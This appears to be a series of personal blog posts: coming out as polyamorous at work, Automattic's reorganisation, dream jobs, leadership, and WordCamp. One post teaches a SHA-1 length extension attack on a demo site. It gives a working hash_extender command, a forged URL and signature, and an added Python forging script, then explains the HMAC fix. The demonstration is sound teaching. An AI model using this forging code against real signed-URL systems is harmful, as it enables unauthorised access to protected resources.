Out as Poly at Work

During one of the periods today that Facebook wasn’t down, a friend who makes use of the platform shared a Facebook post with me, which read:

Has anyone informed work/colleagues about being ENM and how was it received?

I’ve informed a few colleagues but I am considering informing my team as part of my Team Champion and EDI role.

I’ve been “out” at every one of my employers1 since I entered into my first open/nonmonogamous relationship a couple of decades ago.

I didn’t do so immediately: in fact, I waited almost until the point that coming out was an academic necessity! The point at which it was only a matter of time before somebody thought they’d caught us “cheating”… or else because I didn’t want to have to lie to coworkers about e.g. from whom a romantic gift might have come.

Laptop and mug alongside a notebook and pencil. In the notebook is written "TODO: 1. Come out to colleagues. 2. ???. 3. Profit."
I guess I’ll squeeze in “come out to colleagues” in between the project planning meeting and working on rolling out the server upgrades.

Here’s how it went to be “out” at each of the three full-time jobs I’ve held over that period:

SmartData

We lived and worked in and around a small town, and in our small tight-knit team we all had a reasonable handle on what was going on in one another’s personal lives. By the time I was actively in a relationship with Ruth (while still in a relationship with Claire, whom all my coworkers had met at e.g. office parties and the like), it just seemed prudent to mention it, as well as being honest and transparent.

Dan with coworkers and friends drinking in a pub.
This photograph – featuring some of my coworkers – was taken in 2005. At that point, they probably all thought of me as a regular, normal person. At least, as far as my relationship structure was concerned. Not in any other way. Obviously.

It went fine. And it made Monday watercooler conversations about “what I did at the weekend” simpler. Being a small team sharing a single open-plan office meant that I was able to mention my relationship status to literally the entire company at once, and everybody took it with a shrug of noncommittal acceptance.

The Bodleian Libraries

The Bodleian Libraries was a much bigger beast, and in turn a part of the massive University of Oxford. It was big enough to have a “LGBT+ Staff” network within its Equality and Diversity unit, within which – because of cultural intersections2 – I was able to meet a handful of other poly folk at the University.

Dan poses with Bodleian coworkers in front of a party feast in a low-ceilinged office.
This motley crew were exactly as warm and accepting a bunch as you could ask for.

I mentioned very early on – as soon as it came up organically – the structure of the relationship I was in, and everybody was cool (or failing that, at least professional) about it. Curious coworkers asked carefully-crafted questions, and before long (and following my lead) my curious lifestyle choices were as valid a topic for light-hearted jokes as anything else in that fun and gossipy office.

And again: it paid off pragmatically, especially when I took parental leave after the birth of each of our two kids3.

It also helped defuse a situation when I was spotted by a more-distant coworker on my way back from a lunchtime date with a lover who wasn’t Ruth, and my confused colleague introduced herself to the woman that she assumed must’ve been the partner she’d heard about. When I explained that no, this is a different person I’m seeing, my colleague seemed taken aback, and I was glad to be able to call on a passing coworker who knew me better to back me up in my assertion that no, this wasn’t just me trying to lie to cover some illicit work affair! Work allies are useful.

Automattic

I’ve been with Automattic for four and a half years now, and this time around I went one step further in telling potential teammates about my relationship structure by mentioning it in my “Howdymattic” video – a video introduction new starters are encouraged to record to say hi to the rest of the company4.

Framegrab from Dan's Howdymattic video showing him making a "V" shape with his fingers alongside a diagram of his V-shaped relationship.
Some full-on MSPaint grade titling made it into that video, didn’t it?

A convenient side-effect of this early coming-out was that I found myself immediately inducted into the “polymatticians” group – a minor diversity group within Automattic, comprising a massive 1.2% of the company, who openly identify as engaging in nonmonogamous relationships5!

That was eye-opening. Not only does Automattic have a stack of the regular inclusivity groups you might expect from a big tech company (queer, Black, women, trans, neurodiverse) and a handful of the less-common ones (over-40s, cancer survivors, nondrinkers, veterans), they’ve also got a private group for those of us who happen to be both Automatticians and in (or inclined towards) polyamorous relationships. Mind blown.

My relationship structure’s been… quietly and professionally accepted. It doesn’t really come up (why would it? in a distributed company it has even less impact on anything than it did in my previous non-distributed roles)… outside of the “polymatticians” private space.

In summary: I can recommend being “out” at work. So long as you’d feel professionally safe to do so: relationship structure isn’t necessarily a protected characteristic (it’s complicated), and even if it were you might be careful about mentioning it in some environments. It’s great to have the transparency to not have to watch your words when a coworker asks about “your partner”. Plus being free to be emotionally honest at work is just good for your mental wellbeing, in my opinion! If you trust your coworkers, be honest with them. If you don’t… perhaps you need to start looking for a better job?

Footnotes

1 I’m not counting my freelance work during any of those periods, although I’ve been pretty transparent with them too.

2 Let’s be clear: most queer folks, just like most straight folks, seem to be similarly-inclined towards monogamy. But ethical non-monogamy in various forms seems to represent a larger minority within queer communities than outside them. There’s all kinds of possible reasons for this, and smarter people than me have written about them, but personally I’m of the opinion that, for many, it stems from the fact that by the time you’re societally-forced to critically examine your relationships, you might as well go the extra mile and decide whether your relationship structure is right for you too. In other words: I suspect that cis hetero folks would probably have a proportional parity of polyamory if they weren’t saturated with media and cultural role models that show them what their relationship “should” look like.

3 Unwilling to lie, I made absolutely clear that I was neither the father of either of them nor the husband of their mother (among other reasons, the law prohibits Ruth from marrying me on account of being married to JTA), but pointed out that my contract merely stipulated that I was the partner of a birth parent, which was something I’d made completely clear since I first started working there. I’m not sure if I was just rubber-stamped through the University’s leave process as a matter of course or if they took a deeper look at me and figured “yeah, we’re not going to risk picking a legal fight with that guy”, but I got my leave granted.

4 If you enjoyed my “Howdymattic”, you’ll probably also love the outtakes.

5 There are dozens of us! Dozens!


Automattic Shakeup

My employer Automattic‘s having a bit of a reorganisation. For unrelated reasons, this coincides with my superteam having a bit of a reorganisation, too, and I’m going to be on a different team next week than I’ve been on for most of the 4+ years I’ve been there1. Together, these factors mean that I have even less idea than usual what I do for a living, right now.

Dan, wearing an Oxford-branded t-shirt, shrugs and looks confused in front of a screen showing Automattic's "Work With Us" page.
What is it I do here again? Something something code WooCommerce something something marketplace awesome something, right?

On the whole, I approve of Matt‘s vision for this reorganisation. He writes:

Each [Automattic employee] gets a card: Be the Host, Help the Host, or Neutral.

You cannot change cards during the course of your day or week. If you do not feel aligned with your card, you need to change divisions within Automattic.

“Be the Host” folks are all about making Automattic’s web hosting offerings the best they possibly can be. These are the teams behind WordPress.com, VIP, and Tumblr, for example. They’re making us competitive on the global stage. They bring Automattic money in a very direct way, by making our (world class) hosting services available to our customers.

“Help the Host” folks (like me) are in roles that are committed to providing the best tools that can be used anywhere. You might run your copy of Woo, Jetpack, or (the client-side bit of) Akismet on Automattic infrastructure… or alternatively you might be hosted by one of our competitors or even on your own hardware. What we bring to Automattic is more ethereal: we keep the best talent and expertise in these technologies close to home, but we’re agnostic about who makes money out of what we create.

A laptop computer on a desk, showing a WordPress wp-admin page.
This stock photo confuses me so much that I had to use it. It’s WordPress, as seen in Chrome on Windows Vista… but running on a MacBook Air. The photographer has tried to blur their site domain name (but it’s perfectly readable), but hasn’t concealed the fact they’re running µTorrent in the background (for Obviously Legal Reasons, I’m sure). Weird. But the important thing is that, crazy as this person’s choices are, they can use Automattic’s software however they like. It’s cool.

Anyway: I love the clarification on the overall direction of the company… but I’m not sure how we market it effectively2. I look around at the people in my team and its sister teams, all of us proudly holding our “Help the Hosts” cards and ready to work to continue to make Woo an amazing ecommerce platform wherever you choose to host it.

And obviously I can see the consumer value in that. It’s reassuring to know that the open source software we maintain or contribute to is the real deal and we’re not exporting a cut-down version nor are we going to try to do some kind of rug pull to coerce people into hosting with us. I think Automattic’s long track record shows that.

But how do we sell that? How do we explain that “hey, you can trust us to keep these separate goals separate within our company, so there’s never a conflict of interest and you getting the best from us is always what we want”? Personally, seeing the inside of Automattic, I’m convinced that we’re not – like so much of Big Tech – going to axe the things you depend upon3 or change the terms and conditions to the most-exploitative we can get away with4 or support your business just long enough to be able to undermine and consume it5.

In short: I know that we’re the “good guys”. And I can see how this reorganisation reinforces that. But I can’t for the life of me see how we persuade the rest of the world of the fact6.

Any ideas?

Footnotes

1 I’ve been on Team Fire for a long while, which made my job title “Code Magician on Fire”, but now I’ll be on Team Desire which isn’t half as catchy a name but I’m sure they’ll make up for it by being the kinds of awesome human beings I’ve become accustomed to working alongside at Automattic.

2 Fortunately they pay me to code, not to do marketing.

3 Cough… Google.

4 Ahem… Facebook.

5 ${third_coughing_sound}… Amazon.

6 Seriously, it’s a good thing I’m not in marketing. I’d be so terrible at it. Also public relations. Did I ever tell you the story about the time that, as a result of a mix-up, I accidentally almost gave an interview to the Press Office at the Vatican? A story for another time, perhaps.


[Bloganuary] Dream Job

This post is part of my attempt at Bloganuary 2024. Today’s prompt is:

What’s your dream job?

It feels like a bit of a cop-out to say I’m already doing it, but that’s true. Well, mostly (read on and I’ll make a counterpoint!).

Automattic

Dan (wearing a rainbow bandana) waves at the camera; behind him are four work colleagues, and behind that the Colosseum in Rome.
Getting to hang out with my awesome teammates in various locations around the globe is a plus.

I’m incredibly fortunate that my job gets to tick so many of the boxes I’d put on a “dream job wishlist”:

  • I work on things that really matter. Automattic’s products make Web publishing and eCommerce available to the world without “lock-in” or proprietary bullshit. I genuinely believe that Automattic’s work helps to democratise the Internet and acts, in a small way, as a counterbalance to the dominance of the big social media silos.
  • I get to make the world a better place by giving away as much intellectual property as possible. Automattic’s internal policy is basically “you don’t have to ask to open source something; give away anything you like so long as it’s not the passwords”.1 Open Source is one of the most powerful ideas of our generation, and all that.
  • We work in a distributed, asynchronous way. I work from where I want, when I want. I’m given the autonomy to understand what my ideal working environment is and make the most of it. Some mornings I’m just not feeling that coding flow, so I cycle somewhere different and try working the afternoon in a different location. Some weekends I’m struck by inspiration and fire up my work laptop to make the most of it, because, y’know, I’m working on things that really matter and I care about them.
  • I work with amazing people who I learn from and inspire me. Automattic’s home to some incredibly talented people and I love that I’ve managed to find a place that actively pushes me to study new things every day.
  • Automattic’s commitment to diversity & inclusion is very good-to-excellent. As well as getting to work alongside people from a hundred different countries and with amazingly different backgrounds, I love that I get to work in one of the queerest and most queer-affirming environments I’ve ever been paid to be in.

Did I mention that we’re hiring?2

Three Rings

Dan sits at a boardroom table in an airy, bright room. He's wearing an Automattic t-shirt that reads "Let's make the Web a better place." In the background, several other people discuss a pile of post-it notes that have begun to pile up on the table.
I don’t know how I managed to select a photo of my fun-loving kickass volunteers that’s somehow more dry and corporate than the photo of my work colleagues above.

But you know where else ticks all of those boxes? My voluntary work with Three Rings. Let me talk you through that wishlist again:

  • I work on things that really matter. We produce the longest-running volunteer management system in the world3. We produce it as volunteers ourselves, because we believe that volunteering matters and we want to make it as easy as possible for as many people as possible to do as much good as possible, and this allows us to give it away as cheaply as possible: for free, to the smallest and poorest charities.
  • I get to make the world a better place by facilitating the work of suicide helplines, citizens advice bureaus, child support services, environmental charities, community libraries and similar enterprises, museums, theatres, charity fundraisers, and so many more good works. Back when I used to do helpline volunteering I might do a three hour shift and help one or two people, and I was… okay at it. Now I get to spend those three hours making tools that facilitate many tens of thousands of volunteers to provide services that benefit an even greater number of people across six countries.
  • We work in a distributed, asynchronous way. Mostly I work from home; sometimes we get together and do things as a team (like in the photo above). Either way, I’m trusted with the autonomy to produce awesome things in the way that works best for me, backed with the help and support of a team that care with all their hearts about what we do.
  • I work with amazing people who I learn from and inspire me. I mentioned one of them yesterday. But seriously, I could sing the praises of any one of our two-dozen strong team, whether for their commitment to our goals, their dedication to making the world better, their passion for quality and improvement, their focus when producing things that meet our goals, or their commitment to sticking with us for years or decades, without pay, simply because they know that what we do is important and necessary for so many worthy causes. And my fellow development/devops volunteers continue to introduce me to new things, which scratches my “drive-to-learn” itch.
  • Three Rings’ commitment to diversity & inclusion is very good, and improving. We skew slightly queer and have a moderately-diverse gender mix, but I’m especially impressed with our age range these days: there’s at least 50 years between our oldest and youngest volunteers with a reasonably-even spread throughout, which is super cool (and the kind of thing many voluntary organisations dream of!).

The difference

The biggest difference between these two amazing things I get to work on is… only one of them pays me. It’s hard to disregard that.

Sometimes at Automattic, I have to work on something that’s not my favourite project in the world. Or the company’s priorities clash with my own, and I end up implementing something that my gut tells me isn’t the best use of my time from a “make the world a better place” perspective. Occasionally they take a punt on something that really pisses me off.

That’s all okay, of course, because they pay me, and I have a mortgage to settle. That’s fine. That’s part of the deal.

My voluntary work at Three Rings is more… mine. I’m the founder of the project; I 100% believe in what it’s trying to achieve. Even though I’ve worked to undermine the power of my “founder privilege” by entrusting the organisation to a board and exec that I know will push back and challenge me, I feel safe fully trusting that everything I give to Three Rings will be used in the spirit of the original mission. And even though I might sometimes disagree with others on the best way forward, I accept that whatever decision is made comes from a stronger backing than if I’d acted alone.

Three Rings, of course, doesn’t pay me4. That’s why I can only give them a few hours a week of my time. If I could give more, I would, but I have bills to pay so my “day job” is important too: I’m just so incredibly fortunate that that “day job” touches upon many of the same drives that are similarly satisfied by my voluntary work.

If I didn’t have bills to pay, I could happily just volunteer for Three Rings. I’d miss Automattic, of course: there are some amazing folks there whom I love very much, and I love the work. But if they paid me as little as Three Rings did – that is, nothing! – I’d choose Three Rings in a heartbeat.

But man, what a privileged position I’m in that I can be asked what my dream job is and I can answer “well, it’s either this thing that I already do, or this other thing that I already do, depending on whether this hypothetical scenario considers money to be a relevant factor.” I’m a lucky, lucky man.

Footnotes

1 I’m badly-paraphrasing Matt, but you get the gist.

2 Automattic’s not hiring as actively nor as voraciously as it has been for the last few years – a recent downturn in the tech sector, which you may have seen has heavily affected many tech companies, has flooded the market with talent, and we’ve managed to take our fill of them – but we’re still always interested to hear from people who believe in what we do and have skills that we can make use of. And because we’re a community with a lot of bloggers, you can find plenty of first-hand experiences of our culture online if you’d like to solicit some opinions before you apply…

3 Disclaimer: Three Rings is the oldest still-running volunteer management system we’re aware of: our nearest surviving “competitor”, which provides similar-but-different features for a price that’s an order of magnitude greater, launched later in the same year we started. But maybe somebody else has been running these last 22 years that we haven’t noticed, yet: you never know!

4 Assuming you don’t count a Christmas dinner each January – yes, really! (it turns out to be cheaper to celebrate Christmas in January) – as payment.


[Bloganuary] Leadership

This post is part of my attempt at Bloganuary 2024. Today’s prompt is:

What makes a good leader?

I pretty-much answered this in an RSS Only post about a year ago, while talking about the things I’m worst at when I’m a leader, and that I therefore admired in others (along with specific examples of real people I’d worked under). The features I picked out that I admired were:

  • An ability to keep track of all the moving parts in and around a team,
  • The courage to demonstrate and encourage emotional honesty in professional environments, and
  • A keenness to proactively support the people you lead.

A flotilla of paper boats on a table: a red boat leads the way ahead of two blue and two green boats.
An ability to fold origami watercraft is also a bonus in a good leader.

(Incidentally, did you know that I publish some of my posts “RSS Only”: that is, they don’t show up on my homepage, generally don’t appear in my social feeds, etc. The only way to know when one is published is to subscribe to my blog using RSS, or one of the other mechanisms by which my “RSS Only” content gets shared, e.g. email…)


Anyway: I haven’t changed my mind in the last year – for me personally, the qualities I look for in a leader are those that compensate for the things at which I’m weakest. I want a leader that can pull me, push me ahead, point the way, or just hang back and let me explore, depending on what the situation demands. And I still stick by the list I wrote a year ago.


Magician Roles

Because I work somewhere hip enough to let people tweak their job titles, mine is “Code Magician”.

Employee directory photocard showing "Dan Q, Code Magician on Fire (Woo), started Oct 18th, 2019".

LinkedIn isn’t as hip as Automattic, though. That’s why they keep emailing me sector updates… for the “Magician” sector… 😅

Email from LinkedIn with the subject "Hiring trends for Magician roles".


Length Extension Attack Demonstration

Prefer to watch/listen than read? There’s a vloggy/video version of this post in which I explain all the key concepts and demonstrate an SHA-1 length extension attack against an imaginary site.

I understood the concept of a length extension attack, and when/how I needed to mitigate it, for a long time before I truly understood why it worked. It took until work provided me an opportunity to play with one in practice (plus reading Ron Bowes’ excellent article on the subject) before I really grokked it.

Would you like to learn? I’ve put together a practical demo that you can try for yourself!

Screenshot of vulnerable site with legitimate "download" link hovered.
For the demonstration, I’ve built a skeletal stock photography site whose download links are protected by a hash of the link parameters, salted using a secret string stored securely on the server. Maybe they let authorised people hotlink the images or something.

You can check out the code and run it using the instructions in the repository if you’d like to play along.

Using hashes as message signatures

The site “Images R Us” will let you download images you’ve purchased, but not ones you haven’t. Links to the images are protected by a SHA-1 hash1, generated as follows:

Diagram showing SHA1 being fed an unknown secret key and the URL params "download=free" and outputting a hash as a "download key".
The nature of hashing algorithms like SHA-1 means that even a small modification to the inputs, e.g. changing one character in the word “free”, results in a completely different output hash which can be detected as invalid.

When a “download” link is generated for a legitimate user, the algorithm produces a hash which is appended to the link. When the download link is clicked, the same process is followed and the calculated hash compared to the provided hash. If they differ, the input must have been tampered with and the request is rejected.

Without knowing the secret key – stored only on the server – it’s not possible for an attacker to generate a valid hash for URL parameters of the attacker’s choice. Or is it?

Changing download=free to download=valuable invalidates the hash, and the request is denied.

Actually, it is possible for an attacker to manipulate the parameters. To understand how, you must first understand a little about how SHA-1 and its siblings actually work:

SHA-1‘s inner workings

  1. The message to be hashed (SECRET_KEY + URL_PARAMS) is cut into blocks of a fixed size.2
  2. The final block is padded to bring it up to the full size.3
  3. A series of operations are applied to the first block: the inputs to those operations are (a) the contents of the block itself, including any padding, and (b) an initialisation vector defined by the algorithm.4
  4. The same series of operations are applied to each subsequent block, but the inputs are (a) the contents of the block itself, as before, and (b) the output of the previous block. Each block is hashed, and the hash forms part of the input for the next.
  5. The output of running the operations on the final block is the output of the algorithm, i.e. the hash.
Diagram showing message cut into blocks, the last block padded, and then each block being fed into a function along with the output of the function for the previous block. The first function, not having a previous block, receives the IV as its secondary input. The final function outputs the hash.
SHA-1 operates on a single block at a time, but the output of processing each block acts as part of the input of the one that comes after it. Like a daisy chain, but with cryptography.

In SHA-1, blocks are 512 bits long and the padding is a 1, followed by as many 0s as is necessary, leaving 64 bits at the end in which to specify how many bits of the block were actually data.

Padding the final block

Looking at the final block in a given message, it’s apparent that there are two pieces of data that could produce exactly the same output for a given function:

  1. The original data, (which gets padded by the algorithm to make it 64 bytes), and
  2. A modified version of the data, padded in advance with the same bytes the algorithm would add; this must then be followed by an additional block.
Illustration showing two blocks: one short and padded, one pre-padded with the same characters, receiving the same IV and producing the same output.
A “short” block with automatically-added padding produces the same output as a full-size block which has been pre-populated with the same data as the padding would add.5

In the case where we insert our own “fake” padding data, we can provide more message data after the padding and predict the overall hash. We can do this because the output of the first block will be the same as the final, valid hash we already saw. That known value becomes one of the two inputs into the function for the block that follows it (the contents of that block will be the other input). Without knowing exactly what’s contained in the message – we don’t know the “secret key” used to salt it – we’re still able to add some padding to the end of the message, followed by any data we like, and generate a valid hash.

Therefore, if we can manipulate the input of the message, and we know the length of the message, we can append to it. Bear that in mind as we move on to the other half of what makes this attack possible.

Parameter overrides

“Images R Us” is implemented in PHP. In common with most server-side scripting languages, when PHP sees an HTTP query string full of key/value pairs, if a key is repeated then it overrides any earlier iterations of the same key.

Illustration showing variables in a query string: "?one=foo&two=bar&one=baz". When parsed by PHP, the second value of "one" ("baz") only is retained.
Many online sources say that this “last variable matters” behaviour is a fundamental part of HTTP, but it’s not: you can disprove this by examining $_SERVER['QUERY_STRING'] in PHP, where you’ll find the entire query string. You could even implement your own query string handler that instead makes the first instance of each key the canonical one, if you really wanted.6

It’d be tempting to simply override the download=free parameter in the query string at “Images R Us”, e.g. making it download=free&download=valuable! But we can’t: not without breaking the hash, which is calculated based on the entire query string (minus the &key=... bit).

But with our new knowledge about appending to the input for SHA-1 first a padding string, then an extra block containing our payload (the variable we want to override and its new value), and then calculating a hash for this new block using the known output of the old final block as the IV… we’ve got everything we need to put the attack together.

Putting it all together

We have a legitimate link with the query string download=free&key=ee1cce71179386ecd1f3784144c55bc5d763afcc. This tells us that somewhere on the server, this is what’s happening:

Generation of the legitimate hash for the (unknown) secret key a string download=free, with algorithmic padding shown.
I’ve drawn the secret key actual-size (and reflected this in the length at the bottom). In reality, you might not know this, and some trial-and-error might be necessary.7

If we pre-pad the string download=free with some special characters to replicate the padding that would otherwise be added to this final8 block, we can add a second block containing an overriding value of download, specifically &download=valuable. The first value of download=, which will be the word free followed by a stack of garbage padding characters, will be discarded.

And we can calculate the hash for this new block, and therefore the entire string, by using the known output from the previous block, like this:

The previous diagram, but with the padding character manually-added and a second block containing "&download=valuable". The hash is calculated using the known output from the first block as the IV to the function run over the new block, producing a new hash value.
The URL will, of course, be pretty hideous with all of those special characters – which will require percent-encoding – on the end of the word ‘free’.

Doing it for real

Of course, you’re not going to want to do all this by hand! But an understanding of why it works is important to being able to execute it properly. In the wild, exploitable implementations are rarely as tidy as this, and a solid comprehension of exactly what’s happening behind the scenes is far more-valuable than simply knowing which tool to run and what options to pass.

That said: you’ll want to find a tool you can run and know what options to pass to it! There are plenty of choices, but I’ve bundled one called hash_extender into my example, which will do the job pretty nicely:

$ docker exec hash_extender hash_extender \
    --format=sha1 \
    --data="download=free" \
    --secret=16 \
    --signature=ee1cce71179386ecd1f3784144c55bc5d763afcc \
    --append="&download=valuable" \
    --out-data-format=html
Type: sha1
Secret length: 16
New signature: 7b315dfdbebc98ebe696a5f62430070a1651631b
New string: download%3dfree%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8%26download%3dvaluable

I’m telling hash_extender:

  1. which algorithm to use (sha1), which can usually be derived from the hash length,
  2. the existing data (download=free), so it can determine the length,
  3. the length of the secret (16 bytes), which I’ve guessed but could brute-force,
  4. the existing, valid signature (ee1cce71179386ecd1f3784144c55bc5d763afcc),
  5. the data I’d like to append to the string (&download=valuable), and
  6. the format I’d like the output in: I find html the most-useful generally, but it’s got some encoding quirks that you need to be aware of!

hash_extender outputs the new signature, which we can put into the key=... parameter, and the new string that replaces download=free, including the necessary padding to push into the next block and your new payload that follows.

Unfortunately it does over-encode a little: it’s encoded all the & and = (as %26 and %3d respectively), which isn’t what we wanted, so you need to convert them back. But eventually you end up with the URL: http://localhost:8818/?download=free%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e8&download=valuable&key=7b315dfdbebc98ebe696a5f62430070a1651631b.

Browser at the resulting URL, showing the "valuable" image (a pile of money).
Disclaimer: the image you get when you successfully exploit the test site might not actually be valuable.

And that’s how you can manipulate a hash-protected string without access to its salt (in some circumstances).

Mitigating the attack

The correct way to fix the problem is by using an HMAC in place of a simple hash signature. Instead of calling sha1( SECRET_KEY . urldecode( $params ) ), the code should call hash_hmac( 'sha1', urldecode( $params ), SECRET_KEY ). HMACs are theoretically-immune to length extension attacks, so long as the output of the hash function used is functionally-random9.

Ideally, it should also use hash_equals( $validDownloadKey, $_GET['key'] ) rather than ===, to mitigate the possibility of a timing attack. But that’s another story.
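To tie the whole article together, here is an added Python 3 example (standard library only; it is not the article’s code nor hash_extender’s) that reproduces the “download=free” scenario end to end: forge_extension performs the padding-then-resume computation the diagrams describe, verify stands in for the PHP check (including PHP’s last-value-wins handling of a repeated parameter), and the same forgery is tried against the sha1( SECRET . $params ) scheme and against the hash_hmac() fix. The 16-byte secret is constructed for the demonstration, matching the --secret=16 guess above.

```python
"""Length extension against sha1(SECRET . $params), beside the hash_hmac() fix."""
import hashlib
import hmac
import struct
from urllib.parse import parse_qsl

MASK = 0xFFFFFFFF
APPEND = b"&download=valuable"  # the payload used in the article


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _sha1_compress(state, block):
    """One SHA-1 compression step: fold a 64-byte block into the 5-word state."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & MASK, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK for s, v in zip(state, (a, b, c, d, e)))


def sha1_padding(message_len):
    """Padding SHA-1 appends to a message of message_len bytes (footnote 3):
    a 0x80 byte, zeros up to 56 mod 64, then the bit length as big-endian 64-bit."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)


def sign_naive(secret, params):
    """The vulnerable scheme: sha1( SECRET_KEY . $params )."""
    return hashlib.sha1(secret + params).hexdigest()


def sign_hmac(secret, params):
    """The fix: hash_hmac( 'sha1', $params, SECRET_KEY )."""
    return hmac.new(secret, params, hashlib.sha1).hexdigest()


def forge_extension(signature, known_params, secret_len, append):
    """Extend a signature without knowing the secret (what hash_extender does).

    The existing signature is the SHA-1 state after the final block, so it is
    used as the IV for a fresh block holding `append`. Returns the new params
    (known_params + glue padding + append) and the new hex signature.
    """
    glue = sha1_padding(secret_len + len(known_params))
    already_hashed = secret_len + len(known_params) + len(glue)
    tail = append + sha1_padding(already_hashed + len(append))
    state = struct.unpack(">5I", bytes.fromhex(signature))
    for i in range(0, len(tail), 64):
        state = _sha1_compress(state, tail[i:i + 64])
    return known_params + glue + append, b"".join(struct.pack(">I", s) for s in state).hex()


def verify(secret, params, key, signer):
    """Server-side check: recompute the signature over everything but key=...,
    compare in constant time (hash_equals), then read `download` the way PHP
    does, where the LAST occurrence of a repeated parameter wins. Returns the
    selected download, or None when the signature is rejected."""
    if not hmac.compare_digest(signer(secret, params), key):
        return None
    values = dict(parse_qsl(params.decode("latin-1"), keep_blank_values=True))
    return values.get("download")


def demo(secret=b"0123456789abcdef"):
    """Constructed 16-byte secret (matching --secret=16 above); the article's flow."""
    params = b"download=free"
    # Vulnerable verifier: the forged query string and signature are accepted.
    params_n, sig_n = forge_extension(sign_naive(secret, params), params, len(secret), APPEND)
    # HMAC verifier: the same trick applied to an HMAC tag is rejected.
    params_h, sig_h = forge_extension(sign_hmac(secret, params), params, len(secret), APPEND)
    return {
        "naive_result": verify(secret, params_n, sig_n, sign_naive),  # "valuable"
        "hmac_result": verify(secret, params_h, sig_h, sign_hmac),    # None
        "glue": params_n[len(params):-len(APPEND)],  # 0x80, 33 zero bytes, 0xe8
    }


if __name__ == "__main__":
    print(demo())
```

The glue bytes returned by demo() are the same 35 bytes hash_extender percent-encoded above (%80, thirty-three %00, %e8), since 29 bytes of secret-plus-data gives a 232-bit (0xe8) length field.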

Footnotes

1 This attack isn’t SHA1-specific: it works just as well on many other popular hashing algorithms too.

2 SHA-1’s blocks are 64 bytes long; other algorithms vary.

3 For SHA-1, the padding bits consist of a 1 followed by 0s, except the final 8 bytes are a big-endian number representing the length of the message.

4 SHA-1’s IV is 67452301 EFCDAB89 98BADCFE 10325476 C3D2E1F0, which you’ll observe is little-endian counting from 0 to F, then back from F to 0, then alternating between counting from 3 to 0 and C to F. It’s considered good practice when developing a new cryptographic system to ensure that the hard-coded cryptographic primitives are simple, logical, independently-discoverable numbers like simple sequences and well-known mathematical constants. This helps to prove that the inventor isn’t “hiding” something in there, e.g. a mathematical weakness that depends on a specific primitive for which they alone (they hope!) have pre-calculated an exploit. If that sounds paranoid, it’s worth knowing that there’s plenty of evidence that various spy agencies have deliberately done this, at various points: consider the widespread exposure of the BULLRUN programme and its likely influence on Dual EC DRBG.

5 The padding characters I’ve used aren’t accurate, just representative. But there’s the right number of them!

6 You shouldn’t do this: you’ll cause yourself many headaches in the long run. But you could.

7 It’s also not always obvious which inputs are included in hash generation and how they’re manipulated: if you’re actually using this technique adversarially, be prepared to do a little experimentation.

8 In this example, the hash operates over a single block, but the exact same principle applies regardless of the number of blocks.

9 Imagining the implementation of a nontrivial hashing algorithm, the predictability of whose output makes their HMAC vulnerable to a length extension attack, is left as an exercise for the reader.

WCEU23 – Contributor Day

Among the many perks of working for a company with a history so tightly-intertwined with that of the open-source WordPress project is that license to attend WordCamps – the biggest WordPress conferences – is basically a given.

Dan, wearing an Automattic "Let's make the Web a better place" t-shirt, stands in front of a banner welcoming attendees to WordCamp Europe Athens 2023.
So yeah, right now I’m in Athens for WordCamp Europe 2023.

It’s frankly a wonder that this is, somehow, my first WordCamp. As well as using it1 and developing atop it2, of course, I’ve been contributing to WordPress since 2004 (albeit only in a tiny way, and not at all for most of the last decade!).

A table placeholder labelled "WP-CLI". It and a handful of Coke cans and disposable coffee cups are picked-out in colour on an otherwise monochrome and blurred picture.
If you already know what WP-CLI is… let’s be friends.

Today is Contributor Day, a pre-conference day in which folks new and old get together in person to hack on WordPress and WordPress-adjacent projects. So I met up with Cem, my Level 4 Dragonslayer friend, and we took an ultra-brief induction into WP-CLI3 before diving in to try to help write some code.

Dan takes a selfie from a round table covered in laptops, with people hacking at them.
Contributor Days are about many things, but perhaps their biggest value comes from lowering the barrier to becoming a new contributor to an open-source project by sitting you right next to somebody who already knows it well.

So today, as well as meeting some awesome folks, I got to write an overly-verbose justification for a bug report being invalid and implement my first PR for WP-CLI: a bugfix for a strange quirk in output formatting.

Screenshot showing a user running `wp plugin update --all --no-color` but the output putting the word "Success" in green.
The bug I fixed is slightly hard to describe (and even harder to explain why it matters), but here’s a summary: when you run a WP-CLI command that first displays a table and then the result, the result is likely to always appear in colour even if you specify --no-color.

I hope to be able to continue contributing to WP-CLI. I learned a lot about it today, and while I don’t use it as much as I used to in my multisite-management days, I still really respect its power as a tool.

MacBook showing an Automattic "Work For Us" web page, alongside a bottle of Corona Extra. A rooftop terrace garden and swimming pool can be seen in the background.
Did I mention lately how awesome my employers are? I promise my blog’s not always gonna be me shilling for them… but today it is.

Footnotes

1 Even with the monumental stack of custom code woven into DanQ.me, a keen eye will probably spot that it’s WordPress-powered.

2 Perhaps my proudest “built on WordPress” moment was my original implementation of OpenID for WordPress, back in 2005, which is completely obsolete now. But I’ve done plenty of other things, both useful (like the multisite installation used by the University of Oxford) and pointless (like making WordPress a CMS for Gemini, Gopher, and Finger) too over the last 20 years.

3 WP-CLI is… it’s like Drush but for WordPress, if that makes sense to you? If not: it’s a multifaceted command-line tool for installing, configuring, maintaining, and managing WordPress installations, and I’ve been in love with it for years.

Have Fun with Missions, Visions, and Values

I just spent a lightweight week in Rome with fellow members of Automattic’s Team Fire.

Among our goals for the week was an attempt to strengthen the definition of who our team is, what we work on, and how and why we do so. That’s basically a team-level identity, mission, vision, and values, right?

